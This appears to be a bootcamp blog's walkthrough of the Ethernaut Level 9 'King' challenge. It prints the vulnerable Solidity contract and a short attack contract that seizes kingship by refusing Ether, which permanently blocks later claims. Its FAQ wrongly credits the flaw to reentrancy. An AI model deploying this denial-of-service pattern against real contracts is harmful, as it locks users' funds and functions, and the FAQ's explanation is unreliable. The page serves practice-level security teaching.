Skip links

Table of Contents

Ethernaut Level 9 Walkthrough: King

In this challenge, we’ll dive into smart contracts’ payment vulnerability and essential security practices to prevent such issues. By the end of ethernaut level 9, you’ll be equipped to both exploit and safeguard the smart contract effectively.

Objective

Claim kingship forever, ensuring no one can reclaim it.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract King {
    address king;
    uint256 public prize;
    address public owner;

    constructor() payable {
        owner = msg.sender;
        king = msg.sender;
        prize = msg.value;
    }

    receive() external payable {
        require(msg.value >= prize || msg.sender == owner);
        payable(king).transfer(msg.value);
        king = msg.sender;
        prize = msg.value;
    }

    function _king() public view returns (address) {
        return king;
    }
}

Explore Contract

The receive() function determines who becomes the new king based on the value sent. The owner can also reclaim kingship.

Just two lines in this function impact the king’s claim.

require(msg.value >= prize || msg.sender == owner);

You can deposit an amount greater than the old one or be the owner to bypass this check.

payable(king).transfer(msg.value);

This line is critical. It transfers funds to the old king and updates the new king and new prize.

Deposit ETH

There are two account types: External Owned Account (EOA) and Contract Account. Both can receive ETH. EOAs can always receive Ether, while Contract Accounts need to implement receive() or fallback() functions.

Let’s hack

Leveraging this knowledge, we can deploy a contract to claim kingship without implementing any function to receive Ether.

Ensure ETH value is greater than or equal to the current prize (initial prize is 0.001 ETH).

Here’s an example:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract KingForever {
		constructor(address kingContract) payable {
			(bool success,) = kingContract.call{value: msg.value}("");
			require(success);
		}
}

Congratulations! You’ve completed the Ethernaut 9 – King challenge 🥳

Security Takeaways: Ethernaut Level 9 – King

  • Be cautious with external calls and handle errors properly.
  • Consider implementing a separate function for the old king to reclaim funds to mitigate vulnerabilities, following the “Pull over Push” pattern.

Ready for the next Ethernaut challenge? Click to check out the previous ethernaut challenge and stay tuned to see what’s next in our series!

faqethernaut level 9ethernaut challengechallengeking

FAQs

How do I complete Ethernaut Level 9: King?

  • To complete Ethernaut Level 9, you need to disrupt the existing king’s contract by becoming the new king and preventing others from reclaiming the throne.

What is the main objective of Ethernaut Level 9?

  • The main objective is to exploit the vulnerabilities in the King contract and secure your position as the reigning king indefinitely.

What are some common pitfalls in Ethernaut Level 9?

  • Common pitfalls include not accounting for reentrancy issues and failing to properly handle the payable functions.

How can I prevent others from reclaiming the throne in Ethernaut Level 9?

  • You can prevent others by writing a malicious contract that does not forward the throne to any new challengers, effectively blocking others.

Why is understanding reentrancy important in Ethernaut Level 9?

  • Reentrancy is crucial because the King contract’s vulnerability relies on reentrancy attacks, which can be used to lock the throne.

What are some basic steps to start Ethernaut Level 9: King?

  • Basic steps include analyzing the King contract, deploying your own contract to take over, and ensuring your contract prevents others from becoming king.

Metana Guarantees a Job 💼

Plus Risk Free 2-Week Refund Policy ✨

You’re guaranteed a new job in web3—or you’ll get a full tuition refund. We also offer a hassle-free two-week refund policy. If you’re not satisfied with your purchase for any reason, you can request a refund, no questions asked.

Web3 Solidity Bootcamp

The most advanced Solidity curriculum on the internet!

Full Stack Web3 Beginner Bootcamp

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

You may also like

Metana Guarantees a Job 💼

Plus Risk Free 2-Week Refund Policy

You’re guaranteed a new job in web3—or you’ll get a full tuition refund. We also offer a hassle-free two-week refund policy. If you’re not satisfied with your purchase for any reason, you can request a refund, no questions asked.

Web3 Solidity Bootcamp

The most advanced Solidity curriculum on the internet

Full Stack Web3 Beginner Bootcamp

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

Events by Metana

Dive into the exciting world of Web3 with us as we explore cutting-edge technical topics, provide valuable insights into the job market landscape, and offer guidance on securing lucrative positions in Web3.

Subscribe to Lettercamp

We help you land your dream job! Subscribe to find out how

Start Your Application

Secure your spot now. Spots are limited, and we accept qualified applicants on a first come, first served basis..

Career Track(Required)

The application is free and takes just 3 minutes to complete.

What is included in the course?

Expert-curated curriculum

Weekly 1:1 video calls with your mentor

Weekly group mentoring calls

On-demand mentor support

Portfolio reviews by Design hiring managers

Resume & LinkedIn profile reviews

Active online student community

1:1 and group career coaching calls

Access to our employer network

Job Guarantee

Get a detailed look at our Full Stack Bootcamp

Understand the goal of the bootcamp

Find out more about the course

Explore our methodology & what technologies we teach

You are downloading 2024 updated Full stack Bootcamp syllabus!

Download the syllabus to discover our Full-Stack Software Engineering Bootcamp curriculum, including key modules, project-based learning details, skill outcomes, and career support. Get a clear path to becoming a top developer.

"*" indicates required fields

This field is for validation purposes and should be left unchanged.